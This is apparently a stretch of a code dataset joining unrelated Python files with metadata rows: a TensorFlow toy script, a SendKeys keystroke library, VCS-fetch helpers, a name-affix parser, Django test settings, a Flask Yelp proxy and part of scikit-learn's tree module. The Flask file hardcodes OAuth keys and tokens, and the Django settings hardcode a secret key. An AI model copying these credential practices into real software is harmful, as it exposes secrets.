ranVal = rn.randint(1, 100)
ans = funcs.adder(ranVal)
valArr[k] = [ranVal]
ansArr[k] = [ans]
train_step.run(feed_dict={x: valArr, y_: ansArr}) #feed_dict will fill our placeholders
# checks if the predicted label and actualy label are equal
correct_prediction = tf.equal(tf.argmax(y,1), tf.argmax(y_,1))
# changed [True, False, True, True] to [1, 0, 1, 1] and takes mean (probability)
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
# init = 100
# valArr = [0] * init
# ansArr = [0] * init
# for k in range(init):
# ranVal = rn.randint(1, 10000)
# ans = funcs.adder(ranVal)
# valArr[k] = [ranVal]
# ansArr[k] = [ans]
# print(accuracy.eval(feed_dict={x: valArr, y_: ansArr}))
while True:
val = int(input("Enter val to add: "))
# prediction = tf.argmax(y, 1)
classification = y.eval(feed_dict = {x: [[val]]})
print(classification) | mit | 866,288,182,168,310,800 | 36.151899 | 126 | 0.68439 | false | 3.220637 | false | false | false |
tpainter/df_everywhere | df_everywhere/util/SendKeys.py | 1 | 12620 | """
SendKeys.py - Sends one or more keystroke or keystroke combinations
to the active window.
Copyright (C) 2003 Ollie Rutherfurd <[email protected]>
Python License
Version 0.3 (2003-06-14)
$Id$
"""
#From: https://code.google.com/p/sendkeys-ctypes/
import sys
import time
from _sendkeys import char2keycode, key_up, key_down, toggle_numlock
__all__ = ['KeySequenceError', 'SendKeys']
try:
True
except NameError:
True,False = 1,0
KEYEVENTF_KEYUP = 2
VK_SHIFT = 16
VK_CONTROL = 17
VK_MENU = 18
PAUSE = 50/1000.0 # 50 milliseconds
# 'codes' recognized as {CODE( repeat)?}
CODES = {
'BACK': 8,
'BACKSPACE': 8,
'BS': 8,
'BKSP': 8,
'BREAK': 3,
'CAP': 20,
'CAPSLOCK': 20,
'DEL': 46,
'DELETE': 46,
'DOWN': 40,
'END': 35,
'ENTER': 13,
'ESC': 27,
'HELP': 47,
'HOME': 36,
'INS': 45,
'INSERT': 45,
'LEFT': 37,
'LWIN': 91,
'NUMLOCK': 144,
'PGDN': 34,
'PGUP': 33,
'PRTSC': 44,
'RIGHT': 39,
'RMENU': 165,
'RWIN': 92,
'SCROLLLOCK': 145,
'SPACE': 32,
'TAB': 9,
'UP': 38,
'DOWN': 40,
'BACKSPACE': 8,
'F1': 112,
'F2': 113,
'F3': 114,
'F4': 115,
'F5': 116,
'F6': 117,
'F7': 118,
'F8': 119,
'F9': 120,
'F10': 121,
'F11': 122,
'F12': 123,
'F13': 124,
'F14': 125,
'F15': 126,
'F16': 127,
'F17': 128,
'F18': 129,
'F19': 130,
'F20': 131,
'F21': 132,
'F22': 133,
'F23': 134,
'F24': 135,
}
ESCAPE = '+^%~{}[]'
NO_SHIFT = '[]'
SHIFT = {
'!': '1',
'@': '2',
'#': '3',
'$': '4',
'&': '7',
'*': '8',
'_': '-',
'|': '\\',
':': ';',
'"': '\'',
'<': ',',
'>': '.',
'?': '/',
}
# modifier keys
MODIFIERS = {
'+': VK_SHIFT,
'^': VK_CONTROL,
'%': VK_MENU,
}
class KeySequenceError(Exception):
"""Exception raised when a key sequence string has a syntax error"""
def __str__(self):
return ' '.join(self.args)
def _append_code(keys,code):
keys.append((code, True))
keys.append((code, False))
def _next_char(chars,error_msg=None):
if error_msg is None:
error_msg = 'expected another character'
try:
return chars.pop()
except IndexError:
raise KeySequenceError(error_msg)
def _handle_char(c,keys,shift):
if shift:
keys.append((MODIFIERS['+'],True))
_append_code(keys, char2keycode(c))
if shift:
keys.append((MODIFIERS['+'],False))
def _release_modifiers(keys,modifiers):
for c in modifiers.keys():
if modifiers[c]:
keys.append((MODIFIERS[c], False))
modifiers[c] = False
def str2keys(key_string,
with_spaces=False,
with_tabs=False,
with_newlines=False):
"""
Converts `key_string` string to a list of 2-tuples,
``(keycode,down)``, which can be given to `playkeys`.
`key_string` : str
A string of keys.
`with_spaces` : bool
Whether to treat spaces as ``{SPACE}``. If `False`, spaces are ignored.
`with_tabs` : bool
Whether to treat tabs as ``{TAB}``. If `False`, tabs are ignored.
`with_newlines` : bool
Whether to treat newlines as ``{ENTER}``. If `False`, newlines are ignored.
"""
# reading input as a stack
chars = list(key_string)
chars.reverse()
# results
keys = []
# for keeping track of whether shift, ctrl, & alt are pressed
modifiers = {}
for k in MODIFIERS.keys():
modifiers[k] = False
while chars:
c = chars.pop()
if c in MODIFIERS.keys():
keys.append((MODIFIERS[c],True))
modifiers[c] = True
# group of chars, for applying a modifier
elif c == '(':
while c != ')':
c = _next_char(chars,'`(` without `)`')
if c == ')':
raise KeySequenceError('expected a character before `)`')
if c == ' ' and with_spaces:
_handle_char(CODES['SPACE'], keys, False)
elif c == '\n' and with_newlines:
_handle_char(CODES['ENTER'], keys, False)
elif c == '\t' and with_tabs:
_handle_char(CODES['TAB'], keys, False)
else:
# if we need shift for this char and it's not already pressed
shift = (c.isupper() or c in SHIFT.keys()) and not modifiers['+']
if c in SHIFT.keys():
_handle_char(SHIFT[c], keys, shift)
else:
_handle_char(c.lower(), keys, shift)
c = _next_char(chars,'`)` not found')
_release_modifiers(keys,modifiers)
# escaped code, modifier, or repeated char
elif c == '{':
saw_space = False
name = [_next_char(chars)]
arg = ['0']
c = _next_char(chars, '`{` without `}`')
while c != '}':
if c == ' ':
saw_space = True
elif c in '.0123456789' and saw_space:
arg.append(c)
else:
name.append(c)
c = _next_char(chars, '`{` without `}`')
code = ''.join(name)
arg = float('0' + ''.join(arg))
if code == 'PAUSE':
if not arg:
arg = PAUSE
keys.append((None,arg))
else:
# always having 1 here makes logic
# easier -- we can always loop
if arg == 0:
arg = 1
for i in range(int(arg)):
if code in CODES.keys():
_append_code(keys, CODES[code])
else:
# must be an escaped modifier or a
# repeated char at this point
if len(code) > 1:
raise KeySequenceError('Unknown code: %s' % code)
# handling both {e 3} and {+}, {%}, {^}
shift = code in ESCAPE and not code in NO_SHIFT
# do shift if we've got an upper case letter
shift = shift or code[0].isupper()
c = code
if not shift:
# handle keys in SHIFT (!, @, etc...)
if c in SHIFT.keys():
c = SHIFT[c]
shift = True
_handle_char(c.lower(), keys, shift)
_release_modifiers(keys,modifiers)
# unexpected ")"
elif c == ')':
raise KeySequenceError('`)` should be preceeded by `(`')
# unexpected "}"
elif c == '}':
raise KeySequenceError('`}` should be preceeded by `{`')
# handling a single character
else:
if c == ' ' and not with_spaces:
continue
elif c == '\t' and not with_tabs:
continue
elif c == '\n' and not with_newlines:
continue
if c in ('~','\n'):
_append_code(keys, CODES['ENTER'])
elif c == ' ':
_append_code(keys, CODES['SPACE'])
elif c == '\t':
_append_code(keys, CODES['TAB'])
else:
# if we need shift for this char and it's not already pressed
shift = (c.isupper() or c in SHIFT.keys()) and not modifiers['+']
if c in SHIFT.keys():
_handle_char(SHIFT[c], keys, shift)
else:
_handle_char(c.lower(), keys, shift)
_release_modifiers(keys,modifiers)
_release_modifiers(keys,modifiers)
return keys
def playkeys(keys, pause=.05):
"""
Simulates pressing and releasing one or more keys.
`keys` : str
A list of 2-tuples consisting of ``(keycode,down)``
where `down` is `True` when the key is being pressed
and `False` when it's being released.
`keys` is returned from `str2keys`.
`pause` : float
Number of seconds between releasing a key and pressing the
next one.
"""
for (vk, arg) in keys:
if vk:
if arg:
key_down(vk)
else:
key_up(vk)
if pause: # pause after key up
time.sleep(pause)
else:
time.sleep(arg)
def SendKeys(keys,
pause=0.05,
with_spaces=False,
with_tabs=False,
with_newlines=False,
turn_off_numlock=True):
"""
Sends keys to the current window.
`keys` : str
A string of keys.
`pause` : float
The number of seconds to wait between sending each key
or key combination.
`with_spaces` : bool
Whether to treat spaces as ``{SPACE}``. If `False`, spaces are ignored.
`with_tabs` : bool
Whether to treat tabs as ``{TAB}``. If `False`, tabs are ignored.
`with_newlines` : bool
Whether to treat newlines as ``{ENTER}``. If `False`, newlines are ignored.
`turn_off_numlock` : bool
Whether to turn off `NUMLOCK` before sending keys.
example::
SendKeys("+hello{SPACE}+world+1")
would result in ``"Hello World!"``
"""
restore_numlock = False
try:
# read keystroke keys into a list of 2 tuples [(key,up),]
_keys = str2keys(keys, with_spaces, with_tabs, with_newlines)
# certain keystrokes don't seem to behave the same way if NUMLOCK
# is on (for example, ^+{LEFT}), so turn NUMLOCK off, if it's on
# and restore its original state when done.
if turn_off_numlock:
restore_numlock = toggle_numlock(False)
# "play" the keys to the active window
playkeys(_keys, pause)
finally:
if restore_numlock and turn_off_numlock:
key_down(CODES['NUMLOCK'])
key_up(CODES['NUMLOCK'])
def usage():
"""
Writes help message to `stderr` and exits.
"""
print >> sys.stderr, """\
%(name)s [-h] [-d seconds] [-p seconds] [-f filename] or [string of keys]
-dN or --delay=N : N is seconds before starting
-pN or --pause=N : N is seconds between each key
-fNAME or --file=NAME : NAME is filename containing keys to send
-h or --help : show help message
""" % {'name': 'SendKeys.py'}
sys.exit(1)
def error(msg):
"""
Writes `msg` to `stderr`, displays usage
information, and exits.
"""
print >> sys.stderr, '\nERROR: %s\n' % msg
usage()
def main(args=None):
import getopt
if args is None:
args = sys.argv[1:]
try:
opts,args = getopt.getopt(args,
"hp:d:f:", ["help","pause","delay","file"])
except getopt.GetoptError:
usage()
pause=0
delay=0
filename=None
for o, a in opts:
if o in ('-h','--help'):
usage()
elif o in ('-f','--file'):
filename = a
elif o in ('-p','--pause'):
try:
pause = float(a)
assert pause >= 0
except (ValueError,AssertionError),e:
error('`pause` must be >= 0.0')
elif o in ('-d','--delay'):
try:
delay = float(a)
assert delay >= 0
except (ValueError,AssertionError),e:
error('`delay` must be >= 0.0')
time.sleep(delay)
if not filename is None and args:
error("can't pass both filename and string of keys on command-line")
elif filename:
f = open(filename)
keys = f.read()
f.close()
SendKeys(keys, pause)
else:
for a in args:
SendKeys(a, pause)
if __name__ == '__main__':
main(sys.argv[1:])
# :indentSize=4:lineSeparator=\r\n:maxLineLen=80:noTabs=true:tabSize=4:
| gpl-2.0 | -2,442,694,706,506,478,000 | 27.552036 | 85 | 0.467829 | false | 3.827722 | false | false | false |
beenje/addon-pr | addonpr/command.py | 1 | 2291 | # -*- coding: utf-8 -*-
"""
addonpr command module
Copyright (C) 2012-2013 Team XBMC
http://www.xbmc.org
This Program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2, or (at your option)
any later version.
This Program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; see the file LICENSE. If not, see
<http://www.gnu.org/licenses/>.
"""
import os
import sys
import shlex
import shutil
import subprocess
import urllib
import zipfile
import logging
logger = logging.getLogger(__name__)
def run(cmd):
"""Run the shell command and return the result"""
cmd = cmd.encode('utf-8')
logger.debug('Run %s', cmd)
args = shlex.split(cmd)
try:
result = subprocess.check_output(args)
except subprocess.CalledProcessError as e:
sys.stderr.write(e.output)
sys.exit(e.returncode)
else:
return result.strip()
def silent_remove(filenames):
"""Remove the list of files ignoring any error"""
for filename in filenames:
try:
os.remove(filename)
except OSError:
pass
def git_pull(addon, url, revision):
current_dir = os.getcwd()
run('git clone -q "%s" %s' % (url, addon))
os.chdir(addon)
run('git checkout -q "%s"' % revision)
shutil.rmtree('.git')
silent_remove(['.gitignore', '.gitattributes'])
os.chdir(current_dir)
def svn_pull(addon, url, revision):
run('svn export "%s" -r "%s" %s' % (url, revision, addon))
def hg_pull(addon, url, revision):
run('hg clone --insecure -r "%s" "%s" %s' % (revision, url, addon))
shutil.rmtree(os.path.join(addon, '.hg'))
silent_remove([os.path.join(addon, '.hgignore')])
def zip_pull(addon, url, revision):
addon_zip = addon + '.zip'
urllib.urlretrieve(url, addon_zip)
zip_file = zipfile.ZipFile(addon_zip)
zip_file.extractall()
os.remove(addon_zip)
| gpl-2.0 | -608,732,368,011,238,900 | 26.27381 | 71 | 0.659537 | false | 3.719156 | false | false | false |
mikejs/name_tools | name_tools/affixes.py | 1 | 6416 | import re
# I realize *fixes may not be the proper linguistic terms for these.
# No attempt was made to be exhaustive, but some sources used:
# http://en.wikipedia.org/wiki/List_of_post-nominal_letters
# http://en.wikipedia.org/wiki/Pre-nominal_letters
# http://en.wikipedia.org/wiki/Forms_of_address_in_the_United_Kingdom
# Of these, dropping the first 9 are the most likely to cause
# false matches. Perhaps they should be treated separately?
_suffixes = ['Jr', 'Sr', 'II', 'III', 'IV', 'V', 'VI', 'VII', 'VIII',
'PhD', 'MD', 'DD', 'JD', 'PharmD', 'PsyD', 'RN', 'EngD',
'DPhil', 'MA', 'MF', 'MBA', 'MSc', 'MEd', 'EdD', 'DMin',
'AB', 'BA', 'BFA', 'BSc', 'Esq', 'Esquire', 'MP', "MS",
'USA', 'USAF', 'USMC', 'USCG', 'USN', 'Ret', r'\(Ret\)',
'CPA', 'Junior', 'Senior']
_prefixes = ['Mr', 'Mister', 'Mrs', 'Ms', 'Miss', 'Dr', 'Doctor',
'Professor', 'The', 'Honou?rable', 'Chief', 'Justice',
'His', 'Her', 'Honou?r', 'Mayor', 'Associate', 'Majesty',
'Judge', 'Master', 'Sen', 'Senator', 'Rep', 'Deputy',
'Representative', 'Congress(wo)?man', 'Sir', 'Dame',
'Speaker', r'(Majority|Minority)\W+Leader',
'President', 'Chair(wo)?man', 'Pres', 'Governor',
'Gov', 'Assembly\W+Member', 'Highness', 'Hon',
'Prime\W+Minister', r'P\.?M', 'Admiral', 'Adm',
'Colonel', 'Col', 'General', 'Gen', 'Captain',
'Capt', 'Corporal', 'CPL', 'PFC', 'Private',
r'First\W+Class', 'Sergeant', 'Sgt', 'Commissioner',
'Lieutenant', 'Lt', 'Lieut', 'Brigadier',
'Major', 'Maj', 'Officer', 'Pilot',
'Warrant', 'Officer', 'Cadet', 'Reverand',
'Minister', 'Venerable', 'Father', 'Mother', 'Brother',
'Sister', 'Rabbi', 'Fleet']
# The suffixes are obviously not all acronyms but there are probably
# plenty of people out there mistakenly writing things like 'J.r.',
# so we go ahead and allow periods between any letters
_suffix_pattern = [r"\.?".join(suffix) for suffix in _suffixes]
_suffix_pattern = r'\W*,?(\W+(%s)\.?,?)+\W*$' % r"|".join(_suffix_pattern)
_suffix_pattern = re.compile(_suffix_pattern, re.IGNORECASE)
_prefix_pattern = r'^\W*((%s)\.?(\W+|$))+' % r"|".join(_prefixes)
_prefix_pattern = re.compile(_prefix_pattern, re.IGNORECASE)
def drop_affixes(name):
"""
>>> drop_affixes("Mr. Michael Stephens, Jr.")
'Michael Stephens'
>>> drop_affixes("Lieutenant Col. Michael Stephens III, U.S.M.C. (Ret)")
'Michael Stephens'
>>> drop_affixes(" His Honour, Mayor M. Stephens III, J.D., M.D., RN ")
'M. Stephens'
>>> drop_affixes("Mr. Chief Justice")
''
>>> drop_affixes("Michael Stephens")
'Michael Stephens'
>>> drop_affixes(" Michael Stephens ")
'Michael Stephens'
>>> drop_affixes(" Stephens, Michael ")
'Stephens, Michael'
"""
return split_affixes(name)[1]
def split_affixes(name):
"""
>>> split_affixes("Mr. Michael Stephens, Jr.")
('Mr.', 'Michael Stephens', 'Jr.')
>>> split_affixes("Lieutenant Col. Michael Stephens III, U.S.M.C. (Ret)")
('Lieutenant Col.', 'Michael Stephens', 'III, U.S.M.C. (Ret)')
>>> split_affixes(" His Honour, Mayor M. Stephens III, J.D., M.D., RN ")
('His Honour, Mayor', 'M. Stephens', 'III, J.D., M.D., RN')
>>> split_affixes("Mr. Chief Justice")
('Mr. Chief Justice', '', '')
>>> split_affixes("Michael Stephens")
('', 'Michael Stephens', '')
>>> split_affixes(" Michael Stephens ")
('', 'Michael Stephens', '')
>>> split_affixes(" Stephens, Michael ")
('', 'Stephens, Michael', '')
"""
prefixes, name = split_prefixes(name)
name, suffixes = split_suffixes(name)
return (prefixes, name, suffixes)
def drop_suffixes(name):
"""
>>> drop_suffixes("Michael Stephens, Ph.D. J.D, USAF (Ret) III Esq")
'Michael Stephens'
>>> drop_suffixes("Michael Stephens Jr C.P.A ")
'Michael Stephens'
>>> drop_suffixes("Stephens, Michael Jr.")
'Stephens, Michael'
>>> drop_suffixes("Stephens, Michael ")
'Stephens, Michael'
>>> drop_suffixes("Stephens, M.")
'Stephens, M.'
"""
return split_suffixes(name)[0]
def split_suffixes(name):
"""
>>> split_suffixes("Michael Stephens, Ph.D. J.D, USAF (Ret) III Esq")
('Michael Stephens', 'Ph.D. J.D, USAF (Ret) III Esq')
>>> split_suffixes("Michael Stephens Jr C.P.A ")
('Michael Stephens', 'Jr C.P.A')
>>> split_suffixes("Stephens, Michael Jr.")
('Stephens, Michael', 'Jr.')
>>> split_suffixes("Stephens, Michael ")
('Stephens, Michael', '')
>>> split_suffixes("Stephens, M.")
('Stephens, M.', '')
"""
name = name.rstrip()
match = _suffix_pattern.search(name)
if match:
return (name[0:match.start()].rstrip(),
match.group().lstrip('., \t\r\n'))
return (name, '')
def drop_prefixes(name):
"""
>>> drop_prefixes("Mr. Michael Stephens")
'Michael Stephens'
>>> drop_prefixes("Mr Michael Stephens")
'Michael Stephens'
>>> drop_prefixes(" Doctor Michael Stephens")
'Michael Stephens'
>>> drop_prefixes("The Honorable Michael Stephens")
'Michael Stephens'
>>> drop_prefixes("The Hon Mr. Michael Stephens")
'Michael Stephens'
>>> drop_prefixes(" Michael Stephens")
'Michael Stephens'
>>> drop_prefixes("M. Stephens")
'M. Stephens'
"""
return split_prefixes(name)[1]
def split_prefixes(name):
"""
>>> split_prefixes("Mr. Michael Stephens")
('Mr.', 'Michael Stephens')
>>> split_prefixes("Mr Michael Stephens")
('Mr', 'Michael Stephens')
>>> split_prefixes(" Doctor Michael Stephens")
('Doctor', 'Michael Stephens')
>>> split_prefixes("The Honorable Michael Stephens")
('The Honorable', 'Michael Stephens')
>>> split_prefixes("The Hon Mr. Michael Stephens")
('The Hon Mr.', 'Michael Stephens')
>>> split_prefixes(" Michael Stephens")
('', 'Michael Stephens')
>>> split_prefixes("M. Stephens")
('', 'M. Stephens')
"""
name = name.lstrip()
match = _prefix_pattern.match(name)
if match:
return (match.group(0).strip(),
name[match.end():len(name)].lstrip())
return ('', name)
if __name__ == '__main__':
import doctest
doctest.testmod()
| bsd-3-clause | 8,380,350,305,892,751,000 | 34.843575 | 77 | 0.572943 | false | 3.022138 | false | false | false |
CrazyNPC/django-ios-notifications | test/testapp/testapp/settings.py | 1 | 4765 | # Django settings for testapp project.
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', '[email protected]'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': 'test.db',
# The following settings are not used with sqlite3:
'USER': '',
'PASSWORD': '',
'HOST': '', # Empty for localhost through domain sockets or '127.0.0.1' for localhost through TCP.
'PORT': '', # Set to empty string for default.
}
}
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/var/www/example.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://example.com/media/", "http://media.example.com/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/var/www/example.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://example.com/static/", "http://static.example.com/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'c8+4^x2s-j3_ucbbh@r2#&)anj&k3#(u(w-)k&7&t)k&3b03#u'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'testapp.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'testapp.wsgi.application'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'ios_notifications',
# Uncomment the next line to enable the admin:
'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
)
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer'
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'loggers': {}
}
| bsd-3-clause | -726,734,642,830,568,700 | 33.280576 | 127 | 0.714586 | false | 3.673863 | false | false | false |
shelawang/food-picker | main.py | 1 | 2433 | import os
from flask import Flask, request
import argparse
import json
import pprint
import sys
import urllib
import urllib2
import oauth2
import math
app = Flask(__name__)
CONSUMER_KEY = 'H85zQotPvyaafxY-wFjJOg'
CONSUMER_SECRET = 'LRROlUpL-TLVMA25NztXm6gVnHE'
TOKEN = 'Awp8bAxSd7p_dntg10i9jQEYGqIB1gdo'
TOKEN_SECRET = 'TBE0BGBLhDKprgT-Lt8LvJU5mkQ'
@app.route('/request')
def api_call():
host = 'api.yelp.com'
path = '/v2/search'
limit = request.args.get('limit') # limit in number of restaurants
radius = request.args.get('radius') # radius from center in miles
lat = request.args.get('lat') # center latitude
long_ = request.args.get('long') # center longitude
# test data
# limit = '10'
# radius = '10'
# lat = '37.77493'
# long_ = '-122.419415'
delta_lat = int(radius) / 69.11
delta_long = int(radius) / (69.11 * math.cos(float(lat)))
sw_lat = str(float(lat) - delta_lat)
sw_long = str(float(long_) - delta_long)
ne_lat = str(float(lat) + delta_lat)
ne_long = str(float(long_) + delta_long)
term = 'food'
# if request.args.has_key('cat'):
# cat = request.args.get('cat')
# print request.args.get('cat')
encoded_params = "term={0}&bounds={1},{2}|{3},{4}&limit={5}".format(term, sw_lat, sw_long, ne_lat, ne_long, limit)
# else:
# print 'donkeykong'
# encoded_params = "term={0}&bounds={1},{2}|{3},{4}&limit={5}".format(term, sw_lat, sw_long, ne_lat, ne_long, limit)
url = 'http://{0}{1}?{2}'.format(host, path, encoded_params)
# print url
consumer = oauth2.Consumer(CONSUMER_KEY, CONSUMER_SECRET)
oauth_request = oauth2.Request('GET', url, {})
oauth_request.update(
{
'oauth_nonce': oauth2.generate_nonce(),
'oauth_timestamp': oauth2.generate_timestamp(),
'oauth_token': TOKEN,
'oauth_consumer_key': CONSUMER_KEY
}
)
token = oauth2.Token(TOKEN, TOKEN_SECRET)
oauth_request.sign_request(oauth2.SignatureMethod_HMAC_SHA1(), consumer, token)
signed_url = oauth_request.to_url()
print 'Querying {0} ...'.format(url)
conn = urllib2.urlopen(signed_url, None)
try:
response = json.dumps(json.loads(conn.read()))
finally:
conn.close()
return response
if __name__ == '__main__':
port = int(os.environ.get("PORT", 5000))
app.run(host='0.0.0.0', port=port)
| mit | -7,069,045,472,730,618,000 | 26.977011 | 122 | 0.614879 | false | 2.917266 | false | false | false |
leighpauls/k2cro4 | tools/telemetry/telemetry/browser_unittest.py | 1 | 2018 | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from telemetry import browser_finder
from telemetry import options_for_unittests
class BrowserTest(unittest.TestCase):
def testBrowserCreation(self):
options = options_for_unittests.GetCopy()
browser_to_create = browser_finder.FindBrowser(options)
if not browser_to_create:
raise Exception('No browser found, cannot continue test.')
with browser_to_create.Create() as b:
self.assertEquals(1, b.num_tabs)
# Different browsers boot up to different things
assert b.GetNthTabUrl(0)
def testCommandLineOverriding(self):
# This test starts the browser with --enable-benchmarking, which should
# create a chrome.Interval namespace. This tests whether the command line is
# being set.
options = options_for_unittests.GetCopy()
flag1 = '--user-agent=telemetry'
options.extra_browser_args.append(flag1)
browser_to_create = browser_finder.FindBrowser(options)
with browser_to_create.Create() as b:
with b.ConnectToNthTab(0) as t:
t.page.Navigate('http://www.google.com/')
t.WaitForDocumentReadyStateToBeInteractiveOrBetter()
self.assertEquals(t.runtime.Evaluate('navigator.userAgent'),
'telemetry')
def testNewCloseTab(self):
options = options_for_unittests.GetCopy()
browser_to_create = browser_finder.FindBrowser(options)
with browser_to_create.Create() as b:
self.assertEquals(1, b.num_tabs)
existing_tab_url = b.GetNthTabUrl(0)
b.NewTab()
self.assertEquals(2, b.num_tabs)
self.assertEquals(b.GetNthTabUrl(0), existing_tab_url)
self.assertEquals(b.GetNthTabUrl(1), 'about:blank')
b.CloseTab(1)
self.assertEquals(1, b.num_tabs)
self.assertEquals(b.GetNthTabUrl(0), existing_tab_url)
self.assertRaises(AssertionError, b.CloseTab, 0)
| bsd-3-clause | -3,250,190,862,858,584,600 | 38.568627 | 80 | 0.707136 | false | 3.695971 | true | false | false |
PatrickOReilly/scikit-learn | sklearn/tree/tree.py | 1 | 44306 | """
This module gathers tree-based methods, including decision, regression and
randomized trees. Single and multi-output problems are both handled.
"""
# Authors: Gilles Louppe <[email protected]>
# Peter Prettenhofer <[email protected]>
# Brian Holt <[email protected]>
# Noel Dawe <[email protected]>
# Satrajit Gosh <[email protected]>
# Joly Arnaud <[email protected]>
# Fares Hedayati <[email protected]>
# Nelson Liu <[email protected]>
#
# License: BSD 3 clause
from __future__ import division
import numbers
from abc import ABCMeta
from abc import abstractmethod
from math import ceil
import numpy as np
from scipy.sparse import issparse
from ..base import BaseEstimator
from ..base import ClassifierMixin
from ..base import RegressorMixin
from ..externals import six
from ..feature_selection.from_model import _LearntSelectorMixin
from ..utils import check_array
from ..utils import check_random_state
from ..utils import compute_sample_weight
from ..utils.multiclass import check_classification_targets
from ..exceptions import NotFittedError
from ._criterion import Criterion
from ._splitter import Splitter
from ._tree import DepthFirstTreeBuilder
from ._tree import BestFirstTreeBuilder
from ._tree import Tree
from . import _tree, _splitter, _criterion
__all__ = ["DecisionTreeClassifier",
"DecisionTreeRegressor",
"ExtraTreeClassifier",
"ExtraTreeRegressor"]
# =============================================================================
# Types and constants
# =============================================================================
DTYPE = _tree.DTYPE
DOUBLE = _tree.DOUBLE
CRITERIA_CLF = {"gini": _criterion.Gini, "entropy": _criterion.Entropy}
CRITERIA_REG = {"mse": _criterion.MSE, "friedman_mse": _criterion.FriedmanMSE,
"mae": _criterion.MAE}
DENSE_SPLITTERS = {"best": _splitter.BestSplitter,
"random": _splitter.RandomSplitter}
SPARSE_SPLITTERS = {"best": _splitter.BestSparseSplitter,
"random": _splitter.RandomSparseSplitter}
# =============================================================================
# Base decision tree
# =============================================================================
class BaseDecisionTree(six.with_metaclass(ABCMeta, BaseEstimator,
_LearntSelectorMixin)):
"""Base class for decision trees.
Warning: This class should not be used directly.
Use derived classes instead.
"""
@abstractmethod
def __init__(self,
criterion,
splitter,
max_depth,
min_samples_split,
min_samples_leaf,
min_weight_fraction_leaf,
max_features,
max_leaf_nodes,
random_state,
min_impurity_split,
class_weight=None,
presort=False,
increasing=None,
decreasing=None):
self.criterion = criterion
self.splitter = splitter
self.max_depth = max_depth
self.min_samples_split = min_samples_split
self.min_samples_leaf = min_samples_leaf
self.min_weight_fraction_leaf = min_weight_fraction_leaf
self.max_features = max_features
self.random_state = random_state
self.max_leaf_nodes = max_leaf_nodes
self.min_impurity_split = min_impurity_split
self.class_weight = class_weight
self.presort = presort
self.increasing = increasing
self.decreasing = decreasing
self.n_features_ = None
self.n_outputs_ = None
self.classes_ = None
self.n_classes_ = None
self.tree_ = None
self.max_features_ = None
def fit(self, X, y, sample_weight=None, check_input=True,
X_idx_sorted=None):
"""Build a decision tree from the training set (X, y).
Parameters
----------
X : array-like or sparse matrix, shape = [n_samples, n_features]
The training input samples. Internally, it will be converted to
``dtype=np.float32`` and if a sparse matrix is provided
to a sparse ``csc_matrix``.
y : array-like, shape = [n_samples] or [n_samples, n_outputs]
The target values (class labels in classification, real numbers in
regression). In the regression case, use ``dtype=np.float64`` and
``order='C'`` for maximum efficiency.
sample_weight : array-like, shape = [n_samples] or None
Sample weights. If None, then samples are equally weighted. Splits
that would create child nodes with net zero or negative weight are
ignored while searching for a split in each node. In the case of
